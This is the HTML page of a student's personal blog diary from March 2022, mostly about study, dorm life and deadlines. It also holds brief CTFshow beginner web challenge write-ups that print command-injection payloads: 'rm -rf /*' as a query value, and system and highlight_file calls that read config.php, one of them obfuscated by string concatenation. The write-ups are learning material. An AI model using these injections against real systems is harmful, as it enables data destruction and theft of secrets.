<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="format-detection" content="telephone=no"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black"><link rel="icon" href="/images/icons/favicon-16x16.png?v=2.6.2" type="image/png" sizes="16x16"><link rel="icon" href="/images/icons/favicon-32x32.png?v=2.6.2" type="image/png" sizes="32x32"><meta name="description" content="&amp;#x771F;&amp;#x7684;&amp;#x53EA;&amp;#x662F;&amp;#x4E2A;&amp;#x65E5;&amp;#x8BB0;">
<meta property="og:type" content="article">
<meta property="og:title" content="Diary">
<meta property="og:url" content="http://example.com/2022/03/15/dairy/index.html">
<meta property="og:site_name" content="Clutter Box">
<meta property="og:description" content="&amp;#x771F;&amp;#x7684;&amp;#x53EA;&amp;#x662F;&amp;#x4E2A;&amp;#x65E5;&amp;#x8BB0;">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/2022/03/15/dairy/image-20220313233810159.png">
<meta property="og:image" content="http://example.com/2022/03/15/dairy/image-20220315002213188.png">
<meta property="og:image" content="http://example.com/2022/03/15/dairy/image-20220315002504502.png">
<meta property="og:image" content="http://example.com/2022/03/15/dairy/dairy/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5aOr5Yir5LiJ5peld3l4,size_13,color_FFFFFF,t_70,g_se,x_16.png">
<meta property="og:image" content="http://example.com/2022/03/15/dairy/image-20220315003247226.png">
<meta property="og:image" content="http://example.com/2022/03/15/dairy/image-20220315235224538.png">
<meta property="og:image" content="http://example.com/2022/03/15/dairy/image-20220316000036077.png">
<meta property="article:published_time" content="2022-03-14T16:07:45.000Z">
<meta property="article:modified_time" content="2022-03-26T01:07:54.137Z">
<meta property="article:author" content="Kirsten Carton">
<meta property="article:tag" content="daily">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2022/03/15/dairy/image-20220313233810159.png"><title>Diary | Clutter Box</title><link ref="canonical" href="http://example.com/2022/03/15/dairy/"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.12.1/css/all.min.css" type="text/css"><link rel="stylesheet" href="/css/index.css?v=2.6.2"><script>var Stun = window.Stun || {};
var CONFIG = {
  root: '/',
  algolia: undefined,
  assistSearch: undefined,
  fontIcon: {"prompt":{"success":"fas fa-check-circle","info":"fas fa-arrow-circle-right","warning":"fas fa-exclamation-circle","error":"fas fa-times-circle"},"copyBtn":"fas fa-copy"},
  sidebar: {"offsetTop":"20px","tocMaxDepth":6},
  header: {"enable":true,"showOnPost":true,"scrollDownIcon":false},
  postWidget: {"endText":true},
  nightMode: {"enable":true},
  back2top: {"enable":true},
  codeblock: {"style":"default","highlight":"light","wordWrap":false},
  reward: false,
  fancybox: false,
  zoomImage: {"gapAside":"20px"},
  galleryWaterfall: undefined,
  lazyload: false,
  pjax: undefined,
  externalLink: {"icon":{"enable":true,"name":"fas fa-external-link-alt"}},
  shortcuts: undefined,
  prompt: {"copyButton":"Copy","copySuccess":"Copy Success","copyError":"Copy Error"},
  sourcePath: {"js":"js","css":"css","images":"images"},
};

window.CONFIG = CONFIG;</script><meta name="generator" content="Hexo 6.0.0"></head><body><div class="container" id="container"><header class="header" id="header"><div class="header-inner"><nav class="header-nav header-nav--fixed"><div class="header-nav-inner"><div class="header-nav-menubtn"><i class="fas fa-bars"></i></div><div class="header-nav-menu"><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/"><span class="header-nav-menu-item__icon"><i class="fas fa-home"></i></span><span class="header-nav-menu-item__text">Home</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/archives/"><span class="header-nav-menu-item__icon"><i class="fas fa-folder-open"></i></span><span class="header-nav-menu-item__text">Archives</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/categories/"><span class="header-nav-menu-item__icon"><i class="fas fa-layer-group"></i></span><span class="header-nav-menu-item__text">Categories</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/tags/"><span class="header-nav-menu-item__icon"><i class="fas fa-tags"></i></span><span class="header-nav-menu-item__text">Tags</span></a></div></div><div class="header-nav-mode"><div class="mode"><div class="mode-track"><span class="mode-track-moon"></span><span class="mode-track-sun"></span></div><div class="mode-thumb"></div></div></div></div></nav><div class="header-banner"><div class="header-banner-info"><div class="header-banner-info__title">Clutter Box</div><div class="header-banner-info__subtitle"></div></div></div></div></header><main class="main" id="main"><div class="main-inner"><div class="content-wrap" id="content-wrap"><div class="content" id="content"><!-- Just used to judge whether it is an article page--><div id="is-post"></div><div class="post"><header class="post-header"><h1 class="post-title">Diary</h1><div class="post-meta"><span class="post-meta-item post-meta-item--createtime"><span class="post-meta-item__icon"><i class="far fa-calendar-plus"></i></span><span class="post-meta-item__info">Created</span><span class="post-meta-item__value">2022-03-15</span></span><span class="post-meta-item post-meta-item--updatetime"><span class="post-meta-item__icon"><i class="far fa-calendar-check"></i></span><span class="post-meta-item__info">Updated</span><span class="post-meta-item__value">2022-03-26</span></span></div></header><div class="post-body">
        <h1 id="&#x771F;&#x7684;&#x53EA;&#x662F;&#x4E2A;&#x65E5;&#x8BB0;">
          <a href="#&#x771F;&#x7684;&#x53EA;&#x662F;&#x4E2A;&#x65E5;&#x8BB0;" class="heading-link"><i class="fas fa-link"></i></a><a href="#&#x771F;&#x7684;&#x53EA;&#x662F;&#x4E2A;&#x65E5;&#x8BB0;" class="headerlink" title="&#x771F;&#x7684;&#x53EA;&#x662F;&#x4E2A;&#x65E5;&#x8BB0;"></a>&#x771F;&#x7684;&#x53EA;&#x662F;&#x4E2A;&#x65E5;&#x8BB0;</h1>
      <span id="more"></span>


        <h2 id="2022-3-13">
          <a href="#2022-3-13" class="heading-link"><i class="fas fa-link"></i></a><a href="#2022-3-13" class="headerlink" title="2022.3.13"></a>2022.3.13</h2>
      
        <h1 id="CTFshow-&#x840C;&#x65B0;&#x8BA1;&#x5212;web">
          <a href="#CTFshow-&#x840C;&#x65B0;&#x8BA1;&#x5212;web" class="heading-link"><i class="fas fa-link"></i></a><a href="#CTFshow-&#x840C;&#x65B0;&#x8BA1;&#x5212;web" class="headerlink" title="CTFshow &#x840C;&#x65B0;&#x8BA1;&#x5212;web"></a>CTFshow &#x840C;&#x65B0;&#x8BA1;&#x5212;web</h1>
      
        <h2 id="web-6">
          <a href="#web-6" class="heading-link"><i class="fas fa-link"></i></a><a href="#web-6" class="headerlink" title="web 6"></a>web 6</h2>
      <p>&#x7528;&#x53CC;&#x91CD;&#x53D6;&#x53CD;&#x6765;&#x7ED5;&#x8FC7;&#xFF1A;~~1000</p>
<!--more-->


        <h2 id="web-7">
          <a href="#web-7" class="heading-link"><i class="fas fa-link"></i></a><a href="#web-7" class="headerlink" title="web 7"></a>web 7</h2>
      <p>&#x7528;&#x4E8C;&#x8FDB;&#x5236;&#x6765;&#x7ED5;&#x8FC7;&#xFF1A; id=0b1111101000</p>
<img src="/2022/03/15/dairy/image-20220313233810159.png" alt="image-20220313233810159" style="zoom: 50%;">


        <h2 id="web-8">
          <a href="#web-8" class="heading-link"><i class="fas fa-link"></i></a><a href="#web-8" class="headerlink" title="web 8"></a>web 8</h2>
      <p>&#x963F;&#x5446;&#x5220;&#x5E93;&#x8DD1;&#x8DEF;&#xFF0C;&#x771F;&#x662F;&#x5947;&#x5947;&#x602A;&#x602A;</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?flag=rm -rf <span class="comment">/*</span></span><br></pre></td></tr></table></div></figure>

<p>&#x9AD8;&#x6570;</p>
<p>&#x4ECA;&#x5929;&#x542C;&#x4E86;&#x5B66;&#x59D0;&#x89E3;&#x7B54;&#x7591;&#x60D1;</p>
<ol>
<li>&#x9047;&#x5230;f(xt)&#x8FD9;&#x79CD;&#x79EF;&#x5206;&#x8BB0;&#x5F97;&#x4EE4; xt=u,&#x6362;&#x5143;&#x540E;&#x518D;&#x79EF;&#x5206;&#xFF0C;&#x8FD9;&#x662F;&#x4E00;&#x79CD;&#x9898;&#x578B;&#xFF0C;&#x63D0;&#x51FA;&#x81EA;&#x5DF1;&#x9700;&#x8981;&#x7684;&#x53D8;&#x91CF;</li>
<li>&#x672C;&#x5B66;&#x671F;&#x7684;&#x5B9A;&#x79EF;&#x5206;&#x6D4B;&#x8BD5;&#x7684;&#x6700;&#x540E;&#x4E00;&#x9053;&#x9898;&#x7684;&#x601D;&#x8DEF;&#x662F;&#x5012;&#x63A8;&#xFF0C;&#x901A;&#x8FC7;&#x5B9A;&#x4E49;&#x627E;g(x)&#x5728;x=0&#x5904;&#x8FDE;&#x7EED;&#x7684;&#x6761;&#x4EF6;&#xFF0C;&#x7136;&#x540E;&#x9700;&#x8981;&#x4EC0;&#x4E48;&#x5C31;&#x4ECE;&#x9898;&#x76EE;&#x4E2D;&#x7684;&#x6761;&#x4EF6;&#x6765;&#x63A8;</li>
<li>&#x9047;&#x5230;&#x6781;&#x9650;&#x5316;&#x79EF;&#x5206;&#x7684;&#x9898;&#x76EE;&#xFF0C;&#x4E00;&#x822C;&#x662F;&#x627E;&#x5230;&#x4E00;&#x4E2A;&#x51FD;&#x6570;&#xFF0C;&#x7136;&#x540E;&#x8F6C;&#x6362;&#x4E0A;&#x4E0B;&#x9650;</li>
<li>&#x540C;&#x65F6;&#x8FD8;&#x5F04;&#x660E;&#x767D;&#x4E86;&#x600E;&#x6837;&#x8FDB;&#x884C;&#x60AC;&#x94FE;&#x7EBF;&#x6C42;&#x79EF;&#x5206;&#x7684;&#x5316;&#x7B80;&#x7684;&#x73A9;&#x610F;&#xFF0C;&#x5173;&#x952E;&#x5C31;&#x5728;&#x4E8E;&#x628A;&#x6362;&#x8FC7;&#x7684;&#x5143;&#x8FD8;&#x56DE;&#x53BB;</li>
<li>&#x5B66;&#x59D0;&#x8FD8;&#x7ED9;&#x6211;&#x8BB2;&#x4E86;&#x5199;&#x9AD8;&#x6570;&#x4E0B;&#x7B2C;&#x516B;&#x7AE0;&#x7684;&#x5185;&#x5BB9;&#xFF0C;&#x8FC7;&#x4E86;&#x4E00;&#x904D;&#x77E5;&#x8BC6;&#xFF0C;&#x7A0D;&#x5FAE;&#x719F;&#x6089;&#x4E86;&#x4E00;&#x4E0B;&#xFF0C;&#x5927;&#x591A;&#x5C31;&#x662F;&#x5957;&#x516C;&#x5F0F;&#xFF0C;&#x5E0C;&#x671B;&#x7B2C;&#x4E5D;&#x7AE0;&#x8981;&#x597D;&#x597D;&#x5B66;&#x3002;</li>
<li>&#x4ECA;&#x5929;&#x79BB;&#x6563;&#x6CA1;&#x6709;&#x9884;&#x4E60;&#xFF0C;&#x8FD8;&#x6CA1;&#x505A;&#x56E2;&#x65E5;&#x6D3B;&#x52A8;&#x7684;PPT&#xFF0C;&#x8FD8;&#x6CA1;&#x6709;&#x8054;&#x7CFB;&#x56DB;&#x7EA7;&#x6216;&#x8005;&#x5927;&#x82F1;&#x7684;&#x9898;&#xFF0C;&#x4E0B;&#x5468;&#x7684;&#x4EFB;&#x52A1;&#x53EF;&#x80FD;&#x5C31;&#x4F1A;&#x591A;&#x8D77;&#x6765;&#x4E86;</li>
</ol>

        <h2 id="2022-3-14">
          <a href="#2022-3-14" class="heading-link"><i class="fas fa-link"></i></a><a href="#2022-3-14" class="headerlink" title="2022.3.14"></a>2022.3.14</h2>
      <p>&#x4ECA;&#x5929;&#x6CA1;&#x4EC0;&#x4E48;&#x597D;&#x8BF4;&#x7684;&#xFF0C;&#x5927;&#x62B5;&#x5C31;&#x662F;&#x8352;&#x5E9F;&#x4E86;&#x4E24;&#x4E2A;&#x5C0F;&#x65F6;&#x5728;&#x6DD8;&#x5B9D;&#x3001;&#x7A7A;&#x95F4;&#x4E0A;&#xFF0C;&#x7136;&#x540E;&#x4E5F;&#x6CA1;&#x6709;&#x5199;&#x9898;&#xFF0C;&#x9AD8;&#x6570;&#x4E5F;&#x6CA1;&#x9884;&#x4E60;&#xFF0C;&#x660E;&#x5929;&#x8FD8;&#x6709;&#x4F5C;&#x4E1A;&#x4E4B;&#x7C7B;&#x7684;&#x73A9;&#x610F;&#xFF0C;&#x8FD8;&#x6709;&#x4E24;&#x4EFD;PPT&#x6CA1;&#x505A;&#x5B8C;&#xFF0C;&#x8FD8;&#x5C3D;&#x91CF;&#x4E0D;&#x8981;&#x71AC;&#x591C;&#xFF0C;&#x6211;&#x4E0D;&#x8BE5;&#x8FD9;&#x6837;&#xFF0C;&#x4E0D;&#x80FD;&#x518D;&#x8FD9;&#x4E48;&#x4E0B;&#x53BB;&#x4E86;&#xFF0C;&#x6211;&#x662F;&#x8FA3;&#x9E21;&#xFF0C;&#x8FA3;&#x9E21;&#x8BE5;&#x6709;&#x8FA3;&#x9E21;&#x7684;&#x89C9;&#x609F;&#xFF0C;&#x4E0D;&#x8981;&#x518D;&#x8352;&#x5E9F;&#x65F6;&#x95F4;&#x4E86;&#xFF0C;&#x771F;&#x5E0C;&#x671B;&#x81EA;&#x5DF1;&#x4E0D;&#x8981;&#x518D;&#x8FD9;&#x4E48;&#x611A;&#x8822;&#x4E86;&#x3002;</p>

        <h2 id="web9">
          <a href="#web9" class="heading-link"><i class="fas fa-link"></i></a><a href="#web9" class="headerlink" title="web9"></a>web9</h2>
      <p>&#x610F;&#x601D;&#x662F;&#x5FC5;&#x987B;&#x7528;&#x5230;&#x8FD9;&#x51E0;&#x4E2A;&#x4E2D;&#x7684;&#x4E00;&#x4E2A;&#x624D;&#x80FD;&#x5F97;&#x5230;c</p>
<p>payload&#x5982;&#x4E0B;</p>
<img src="/2022/03/15/dairy/image-20220315002213188.png" alt="image-20220315002213188" style="zoom: 50%;">

<p>&#x5148;&#x7528;system&#x67E5;&#x770B;&#x6587;&#x4EF6;&#xFF08;&#x610F;&#x601D;&#x662F;&#x8BF4;&#x5FEB;&#x56DE;&#x53BB;&#x590D;&#x4E60;PHP&#x8BED;&#x6CD5;&#xFF09;</p>
<img src="/2022/03/15/dairy/image-20220315002504502.png" alt="image-20220315002504502" style="zoom:50%;">

<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">?c=<span class="title function_ invoke__">system</span>(<span class="string">&apos;ls&apos;</span>)</span><br><span class="line">    </span><br><span class="line">?c=<span class="title function_ invoke__">highlight_file</span>(<span class="string">&apos;config.php&apos;</span>);</span><br></pre></td></tr></table></div></figure>

<p>highlight_file&#x540E;&#x5C31;&#x6709;flag&#x4E86;</p>
<p><img src="/2022/03/15/dairy/dairy/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5aOr5Yir5LiJ5peld3l4,size_13,color_FFFFFF,t_70,g_se,x_16.png" alt="img"></p>
<p>&#x53EF;&#x6076;&#xFF0C;&#x6CA1;&#x6709;&#x56FE;&#x7247;</p>
<img src="/2022/03/15/dairy/image-20220315003247226.png" alt="image-20220315003247226" style="zoom:33%;">


        <h1 id="&#x6CA1;&#x9519;&#x8FD9;&#x662F;&#x4E00;&#x7BC7;&#x65E5;&#x8BB0;">
          <a href="#&#x6CA1;&#x9519;&#x8FD9;&#x662F;&#x4E00;&#x7BC7;&#x65E5;&#x8BB0;" class="heading-link"><i class="fas fa-link"></i></a><a href="#&#x6CA1;&#x9519;&#x8FD9;&#x662F;&#x4E00;&#x7BC7;&#x65E5;&#x8BB0;" class="headerlink" title="&#x6CA1;&#x9519;&#x8FD9;&#x662F;&#x4E00;&#x7BC7;&#x65E5;&#x8BB0;"></a>&#x6CA1;&#x9519;&#x8FD9;&#x662F;&#x4E00;&#x7BC7;&#x65E5;&#x8BB0;</h1>
      
        <h2 id="web10">
          <a href="#web10" class="heading-link"><i class="fas fa-link"></i></a><a href="#web10" class="headerlink" title="web10"></a>web10</h2>
      <p>payload&#x5982;&#x4E0B;&#xFF0C;&#x53EB;&#xFF1A;PHP&#x8BED;&#x6CD5;&#x591A;&#x6B21;&#x5B9A;&#x4E49;</p>
<!--more-->

<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?c=$x=&apos;sys&apos;;$y=&apos;tem&apos;;$z=$x.$y;$z(&apos;cat config.php&apos;);</span><br></pre></td></tr></table></div></figure>

<img src="/2022/03/15/dairy/image-20220315235224538.png" alt="image-20220315235224538" style="zoom:50%;">

<p>&#x4E3A;&#x751A;&#x4E48;&#x5440;&#xFF1F;&#xFF1F;&#x8FD9;&#x4E48;&#x8BF4;&#x90A3;c&#x5E94;&#x8BE5;&#x662F;$x&#x624D;&#x5BF9;&#xFF0C;&#x540E;&#x9762;&#x7684;$z&#x548C;c&#x6709;&#x4EC0;&#x4E48;&#x5173;&#x7CFB;&#x634F;&#xFF1F;&#xFF1F;</p>
<img src="/2022/03/15/dairy/image-20220316000036077.png" alt="image-20220316000036077" style="zoom:33%;">

<p>&#x5237;&#x65B0;&#x540E;&#x7ADF;&#x7136;&#x8981;&#x67E5;&#x770B;&#x6E90;&#x7801;&#xFF1F;&#xFF1F;&#x8FD9;&#x53C8;&#x662F;&#x4EC0;&#x4E48;&#x64CD;&#x4F5C;&#xFF0C;&#x5509;&#x3002;&#x7FA4;&#x91CC;&#x8BF4;&#x840C;&#x65B0;&#x8BA1;&#x5212;&#x505A;&#x4E86;&#x540E;&#x9762;&#x7684;web&#x9898;&#x4E00;&#x6837;&#x4E0D;&#x4F1A;&#x5199;T_T</p>
<p>&#x4E0D;&#x5BF9;&#xFF0C;&#x4ECA;&#x5929;&#x53C8;&#x662F;&#x4EC0;&#x4E48;&#x4E5F;&#x6CA1;&#x5E72;&#xFF0C;&#x660E;&#x5929;&#x6709;&#x4E2A;&#x56E2;&#x65E5;&#x6D3B;&#x52A8;&#xFF0C;&#x665A;&#x4E0A;&#x8FD8;&#x6709;&#x8BFE;&#xFF0C;&#x53EF;&#x6076;&#xFF0C;&#x600E;&#x4E48;&#x4F1A;&#x8FD9;&#x6837;&#xFF0C;</p>
<p>&#x4ECA;&#x5929;C&#x8BED;&#x8A00;&#x60F3;&#x5199;&#x5199;for&#x5FAA;&#x73AF;&#xFF0C;&#x597D;&#x5BB6;&#x4F19;&#xFF0C;&#x5DEE;&#x70B9;&#x90FD;&#x5FD8;&#x4E86;&#x683C;&#x5F0F;&#x4E86;&#xFF0C;&#x770B;&#x6765;&#x6BCF;&#x5929;&#x90FD;&#x9700;&#x8981;&#x6572;&#x6572;&#x4EE3;&#x7801;&#x4E86;&#x3002;</p>
<p>&#x6709;&#x65F6;&#x95F4;&#x628A;&#x65E5;&#x8BB0;&#x653E;&#x4E00;&#x7BC7;&#x5427;&#xFF0C;&#x5206;&#x5F00;&#x5199;&#x592A;&#x9EBB;&#x70E6;&#x4E86;</p>
<p>C&#x2019;est la vie.</p>

        <h1 id="Diary-Dairy-Dairy">
          <a href="#Diary-Dairy-Dairy" class="heading-link"><i class="fas fa-link"></i></a><a href="#Diary-Dairy-Dairy" class="headerlink" title="Diary Dairy Dairy"></a>Diary Dairy Dairy</h1>
      
        <h2 id="Mar-16-2022">
          <a href="#Mar-16-2022" class="heading-link"><i class="fas fa-link"></i></a><a href="#Mar-16-2022" class="headerlink" title="Mar.16 2022"></a>Mar.16 2022</h2>
      
        <h2 id="dairy-for-this-day">
          <a href="#dairy-for-this-day" class="heading-link"><i class="fas fa-link"></i></a><a href="#dairy-for-this-day" class="headerlink" title="dairy for this day"></a>dairy for this day</h2>
      <p>Yes ,it&#x2019;s a new night. Today, I did nothing ,but finally finished the class activities. Well ,if I didn&#x2019;t feel embarrassed ,I would finished it as well as before.</p>
<p>To say that, I still have a ppt waiting for me to finish, still have two speech essay to finish.</p>
<p>&#x7B97;&#x4E86;&#xFF0C;&#x65B0;&#x5F00;&#x4E00;&#x4E2A;wp&#x5408;&#x96C6;&#x5427;</p>
<p>&#x65E5;&#x8BB0;&#x4EC0;&#x4E48;&#x7684;&#x4E1C;&#x4E1C;&#xFF0C;&#x5C31;&#x653E;&#x8FD9;&#x4E2A;&#x6587;&#x4EF6;&#x5939;&#x5C31;&#x597D;&#x4E86;</p>
<p>&#x6211;&#x771F;&#x6CA1;&#x6709;&#x6536;&#x62FE;&#xFF0C;&#x8981;&#x662F;&#x6709;&#x4EBA;&#x8BBF;&#x95EE;&#x4E86;&#x8FD9;&#x4E2A;&#x535A;&#x5BA2;&#xFF0C;&#x6050;&#x6015;&#x8981;&#x88AB;&#x6211;&#x7684;&#x6742;&#x4E71;&#x65E0;&#x7AE0;&#x7ED9;&#x6C14;&#x5230;&#xFF0C;&#x8FD9;&#x662F;&#x4E00;&#x4E2A;&#x5B66;&#x7406;&#x79D1;&#x7684;&#x4EBA;&#x8BE5;&#x6709;&#x7684;&#x4E25;&#x8C28;&#x601D;&#x7EF4;&#x5417;</p>
<p>&#x7A81;&#x7136;&#x5C31;&#x60F3;&#x8D77;&#x4E86;&#x9AD8;&#x4E2D;Ms.Wang &#x5BF9;&#x6211;&#x4EEC;&#x8BF4;&#x7684;&#x8BDD;&#x3002;&#x54C8;&#x54C8;&#x54C8;&#x54C8;&#x8BE5;&#x8BF4;&#x5E78;&#x597D;&#x6CA1;&#x6709;&#x5B66;&#x6CD5;&#x5F8B;&#x5417;&#xFF0C;&#x575A;&#x6301;&#x4E86;&#x81EA;&#x5DF1;&#x662F;&#x4E2A;&#x7406;&#x79D1;&#x751F;&#x7684;&#x4E8B;&#x5B9E;&#x3002;</p>
<p>&#x6CA1;&#x9519;&#xFF0C;&#x6211;&#x8FD8;&#x5DEE;&#x4E00;&#x4E2A;&#x57F9;&#x8BAD;PPT&#xFF0C;&#x8FD8;&#x6709;&#x4E24;&#x7BC7;&#x6F14;&#x8BB2;&#x7A3F;&#xFF0C;&#x987A;&#x4FBF;&#x50AC;&#x50AC;&#x81EA;&#x5DF1;&#x7684;C&#x8BED;&#x8A00;&#x4F5C;&#x4E1A;&#x3002;</p>
<p>&#x751F;&#x547D;&#x5C06;&#x5982;&#x6625;&#x5929;&#x822C;&#x5230;&#x6765;&#xFF0C;&#x56FE;&#x4E66;&#x9986;&#x524D;&#x76DB;&#x5F00;&#x7684;&#x82B1;&#x6811;&#xFF0C;&#x6709;&#x6E05;&#x65B0;&#x7684;&#x6D45;&#x7C89;&#xFF0C;&#x6709;&#x6DE1;&#x96C5;&#x7684;&#x7C73;&#x767D;&#xFF1B;&#x7389;&#x5170;&#x82B1;&#xFF0C;&#x6A31;&#x82B1;&#x5B89;&#x9759;&#x5730;&#x5C55;&#x9732;&#x4E86;&#x81EA;&#x5DF1;&#x7684;&#x82B3;&#x989C;&#xFF0C;&#x4E00;&#x7C07;&#x7C07;&#xFF0C;&#x4E00;&#x56E2;&#x56E2;&#xFF0C;&#x597D;&#x4E00;&#x526F;&#x6625;&#x65E5;&#x4E3D;&#x666F;&#xFF01;</p>
<p>&#x665A;&#x4E0A;&#x4E0B;&#x4E86;&#x66B4;&#x96E8;&#xFF0C;&#x98CE;&#x5E26;&#x6765;&#x4E86;&#x96E8;&#x70B9;&#xFF0C;&#x706F;&#x5149;&#x878D;&#x8FDB;&#x4E86;&#x7115;&#x7136;&#x4E00;&#x65B0;&#x7684;&#x4E16;&#x754C;&#xFF0C;&#x6D41;&#x5149;&#x6EA2;&#x5F69;&#x95F4;&#xFF0C;&#x5929;&#x5730;&#x53C8;&#x88AB;&#x6D17;&#x5237;&#x4E86;&#x4E00;&#x756A;&#x3002;</p>

        <h1 id="Mar-17">
          <a href="#Mar-17" class="heading-link"><i class="fas fa-link"></i></a><a href="#Mar-17" class="headerlink" title="Mar.17"></a>Mar.17</h1>
      
        <h2 id="lots-of-special-matters">
          <a href="#lots-of-special-matters" class="heading-link"><i class="fas fa-link"></i></a><a href="#lots-of-special-matters" class="headerlink" title="lots of special matters"></a>lots of special matters</h2>
      <p><font color="white">Today ,there are happening lots of things ,one of my rm posted sth offense on the chatting room of our dorm&#x2019;s exclusive one.</font></p>
<p><font color="white">After seeing this impolite post,I kept silence for a long time,and didn&#x2019;t say anything .I knew that there was a huge gap that split us by the little thing&#x2014;sleepness conflict. Well,the misapprehend was solved ,I didn&#x2019;t feel very good about what happened today .I just prey that please,please,let the misconstrue disappear ,to make our small but cozy and warm nestle come back. </font></p>
<p><font color="white">Every one has his or her own experiences,but to learn to consider about other&#x2019;s feeling always will be a tough lesson for me to learn.</font></p>
<p>&#x4ECA;&#x5929;&#x7A81;&#x7136;&#x591A;&#x4E86;&#x597D;&#x591A;&#x4E8B;&#x60C5;&#xFF0C;&#x5929;&#x5566;&#x64B8;&#xFF0C;&#x5FD9;&#x4E0D;&#x8FC7;&#x6765;&#x5566;orz</p>
<p>&#x4E8B;&#x60C5;&#x591A;&#x4F46;&#x662F;&#x4E0D;&#x8981;&#x5077;&#x5DE5;&#x51CF;&#x6599;&#x554A;&#xFF0C;&#x8981;&#x662F;&#x53EA;&#x662F;&#x4E3A;&#x4E86;&#x5B8C;&#x6210;&#x800C;&#x5B8C;&#x6210;&#x90A3;&#x8FD8;&#x4E0D;&#x5982;&#x4E0D;&#x5B8C;&#x6210;&#xFF0C;&#x54FC;&#x3002;</p>
<p>&#x8BDD;&#x8BF4;&#x660E;&#x5929;&#x539F;&#x795E;2.6&#x5C31;&#x8981;&#x5F00;&#x524D;&#x77BB;&#x76F4;&#x64AD;&#x4E86;&#xFF0C;&#x597D;&#x5F00;&#x5FC3;&#x563F;&#x563F;&#xFF0C;&#x7B49;&#x6211;&#x6709;&#x7A7A;&#x4E86;&#x5C31;&#x53BB;&#x770B;&#x56DE;&#x653E;T_T</p>
<p>&#x98CE;&#x795E;&#x5927;&#x4EBA;&#x7684;&#x5148;&#x8FDB;&#x7406;&#x5FF5;&#x5C06;&#x5F15;&#x5BFC;&#x8499;&#x5FB7;&#x57CE;&#x7684;&#x5C45;&#x6C11;&#x4E3A;&#x5B9E;&#x73B0;&#x7F8E;&#x597D;&#x751F;&#x6D3B;&#x800C;&#x6478;&#x9C7C;&#xFF08;&#x4E0D;&#x662F;</p>
<p><font color="white">Yeah, to be thoughtful about others doesn&#x2019;t mean that the one compromise to another should low descend his or her bottom line, doesn&#x2019;t mean that another one can offend the one with no hostility.</font></p>
<p><font color="white">We can compromise to uphold our relationship,but cannot accept the unprovoked (for no reason) censure.</font></p>
<p><font color="white">Although it&#x2019;s the one&#x2019;s unintended behavior,but once it is misunderstand and becomes the excuse to leap off other&#x2019;s grievance.</font></p>
<p><font color="white">Maybe there should be an apology for everyone ,that every person should make to one another.</font></p>
<p><font color="white">The stiff atmosphere made me feel bad. Hope this depressed air would change in tomorrow.</font></p>

        <h1 id="Mar-20">
          <a href="#Mar-20" class="heading-link"><i class="fas fa-link"></i></a><a href="#Mar-20" class="headerlink" title="Mar.20"></a>Mar.20</h1>
      
        <h2 id="lots-of-deadline">
          <a href="#lots-of-deadline" class="heading-link"><i class="fas fa-link"></i></a><a href="#lots-of-deadline" class="headerlink" title="lots of deadline"></a>lots of deadline</h2>
      <p>To be honest ,to go ,to learn ,to play on one&#x2019;s own,some times could be a pretty lonely thing(on other people &#x2018;s prospective),but when there is some special things happened recently ,I found that to be a person seems not bad .I don&#x2019;t have to worry about rm&#x2019;s learning proceed,I just consider my own things .I don&#x2019;t have to endure the tromperie that pretend to low the alert that the rm may think I manifest myself conspicuously. </p>
<p>Well,every one has it&#x2019;s own pace to live their lives. Some keep learning and make great progress in their field and achieve one after another achievement. Some keep shining ,to get into different activities,and gain many sweet relationship. Some like me, maybe I have a goal, but never get there whatever I do. Maybe  I have no persistence ,maybe my learning skill is pretty poor, in the last few years that I have experienced ,I achieved nothing.</p>
<p>Today there still are some drizzle in the sky, making the temperature cooler and cooler. After eating a luxury lunch(for the one spend to many &#xFFE5; on the anonymous costs and left very a little  now), I went to the garden in front of the library. The floor was pretty beloved,and the air was truly cold. So without appreciating the beauty of the spring ,I went into the library.</p>
<p>Well, now I remember why I open this post and began to write. The trees where the floors bloom fervently are not as many as I thought a college should possess. Then ,I recalled the life since I got into this university, epidemic would be with all of us for a long time ,it was it that takes off my excellent college life. But from other point ,the university&#x2019;s life may be not colorful, but I still experienced some new things ,to have a glimpse of this respectful city.</p>
<p>Okok, I have talked to much ,it&#x2019;s time to do the proper business.</p>

        <h1 id="Mar-26">
          <a href="#Mar-26" class="heading-link"><i class="fas fa-link"></i></a><a href="#Mar-26" class="headerlink" title="Mar.26"></a>Mar.26</h1>
      <p>Well,today is also a day for laptop,below is sth about <strong>if</strong></p>
<figure class="highlight c"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;conio.h&gt;</span></span></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span> {</span><br><span class="line">	<span class="type">int</span> a = <span class="number">8</span>, b = <span class="number">2</span>;</span><br><span class="line">	<span class="keyword">if</span>(a&gt;b) {a=b;b=a;} 